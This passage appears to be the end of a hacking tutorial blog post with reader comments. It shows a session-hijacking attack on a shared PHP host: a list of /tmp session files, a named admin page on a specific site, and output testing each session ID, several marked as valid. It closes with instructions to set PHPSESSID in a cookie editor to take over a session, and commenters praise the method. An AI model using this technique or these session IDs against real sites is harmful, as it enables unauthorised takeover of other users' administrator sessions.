/tmp/sess_f9f921470ee47444c7791e1a6815c366<<
/tmp/sess_06dfc858e29463e09b2ed44bc812b729<<
/tmp/sess_d4f8e678d8108ad70b28cb8fbb86602a<<
/tmp/sess_b1dad5c77d2e7759fff5de024f70bcd2<<
/tmp/sess_3d76378da05dfc275e7fa7534765b4e0<<
/tmp/sess_66756676551d15e75ddf4690bcfc4255<<
/tmp/sess_b060e45d0416fd1e0eeb2a2dbec3bf64<<
/tmp/sess_d6354cf7e8dd7206dca99f5494771014<<
/tmp/sess_1dbe9d966fc9ec157a903b13d89b6a6b<<
/tmp/sess_3aab149e17e00cdc1aa588dfc8d6742d<<
/tmp/sess_262711d9eb704659fe2313313077b60c<<
/tmp/sess_febad61f7b39b769858f02ae558f987c<<
/tmp/sess_f1060aacaef512550173ddbe6d6adfc3<<
/tmp/sess_d3cadb66de3bbf01e3ba52dcb1602605<<
/tmp/sess_678794d7b2951c106d3bd48cda4b2057<<
/tmp/sess_84f167bcbf44b8221660ad2511c6c549<<
/tmp/sess_494e3655809a2ccc934c259615b83188<<
/tmp/sess_8119ea71bbebf9c721478c90e44c65d9<<
/tmp/sess_a76072fa730980956806021d7b5738bd<<
/tmp/sess_5062dbb13be5cd38e5f5ef2192fa34d7<<
/tmp/sess_bb80110beeb860d2ad912efffb4d7888<<
/tmp/sess_572b6ed7c2f3cab110b38dfe53aebdcb<<
/tmp/sess_89d31a8b438ce6d999161e87bb28d66f<<
/tmp/sess_41d7a719a63e9e76bfca4d581027af07<<
/tmp/sess_2c60c90294f8aeb12ecb3e11f7114cc6<<
/tmp/sess_be57f9aeec7b02f7172f9d98fd79a7c3<<
/tmp/sess_71a756327f6ec13baeb4143c5249ae3d<<
/tmp/sess_4baa3c740a2a73d8b08dee8700609431<<
/tmp/sess_edc945a7c9962866ad8e44bfb955e53f<<
/tmp/sess_3d043749f61208cf261e832ba0975018<<
/tmp/sess_7ff76e6a11c522de8bef92f58fe965bb<<
/tmp/sess_d6c574ebaaff829c17270a7984cd395d<<
/tmp/sess_7033c937b40fdb75e54f74010a4a316a<<
/tmp/sess_55b315ed63e302d7da75c59b96a87361<<
/tmp/sess_afa364bd9cfc25e50a3912e24e0d18b6<<
/tmp/sess_b745731e79c480079c5412e6796aa844<<
/tmp/sess_50a726433fdf4c096e99a90b9f1180f4<<
/tmp/sess_333864077076ad1a6df84ca1fb2f8dc8<<
/tmp/sess_889ac846bb6d5c5df97b9fd7f926d861<<
/tmp/sess_2933b4ac9f6a8621e87fe24dee939520<<

-----------------------------------------
Admin Page Url# asa7be.me/user.php
Good Login Key# logout.php
- a60d366d9a2ad7a33516d742e0acb3c0 > Failed
- 7e6b48474d4622bbbfdb44a0abee3ae5 > Failed
- cf1487d4d364d0d5b5da78d6a2f1c829 > Failed
- b490eaf9813e7ce2f9f970ec5d5148a8 > Failed
[*] 69fb5a0be14029efa7823f36bba950a3 > Valid session
- af20ab592b6436a4b4662b3ef9d20949 > Failed
[*] 39492febe0be4657c8b74467a928ed86 > Valid session
- 08628cb08a83a88fb3b13cf0831ed2c2 > Failed
- 3fe3f2dfd3c53e47a47f4a287023e4f1 > Failed
- 7d3b2096da471dc454c7ebe37ea391a8 > Failed
- 0ae576840230a014d66d13876274b4ec > Failed
[*] d14f707dbacf3fc150d028d948a7783a > Valid session
- 3adfad96853e169b614eab8cbb33f399 > Failed
- e8eb5d28f2e9477146b5d77a4641f2fa > Failed
- 7054ba034eecd52aaee4daf29b3f083f > Failed
- a6b7407deff4c1ecf006beeb75816740 > Failed
- e8cebcc6e019029994a2ace049194c08 > Failed
- 26172952f18902859ff1cc6db5e7a5c2 > Failed
- 82acf501eee50586fafad1474ad3e6f8 > Failed
- bcc1e8dab78046443c25666ca3155e32 > Failed
- 323a64eadbe2a9f3d65c92698a8a80c8 > Failed
- 9ec31c6914e31acd0e309c062162e7f9 > Failed
- 936443410e7ff83a2ed87436fb385c8c > Failed
- cd5a0c95753e3edabe324b638181592d > Failed
- 6281d2ea4f929d5643f543c7ba6afe56 > Failed
- c28491c9d0761f286653d8dd2accf8f0 > Failed
- 8244ba71a97f1a014c4af61185a3d9ca > Failed
[*] d4a7db7eb38c2d27f3ae1c9b443c53d5 > Valid session
Now via any cookie Editor : PHPSESSID=session_id
and we are done ;)
./Faris

8 comments:

القط said...

good job faris :)

Faris said...

Thanks Mr Ap0calypse ,
why u r not online any more??

Anonymous said...

gr8 Tut! as always

the method is Extremely-Amazing


Best regards
14rQi 1337.

L3b-r1'z said...

King :D

Anonymous said...

brilliant faris
keep good work bro
(Thumbs Up)

Anonymous said...

Wow best idea from your mind
faris i see you
i see a big1337h4ck3r


see u letr

n4ss1m said...

nice ya 7ag :p , i didn't understand anything xD
nb : sometimes , ls /tmp/ => access denied :D

lollolbadr said...

جامد فحت يا برنسوووووووووووو

Post a Comment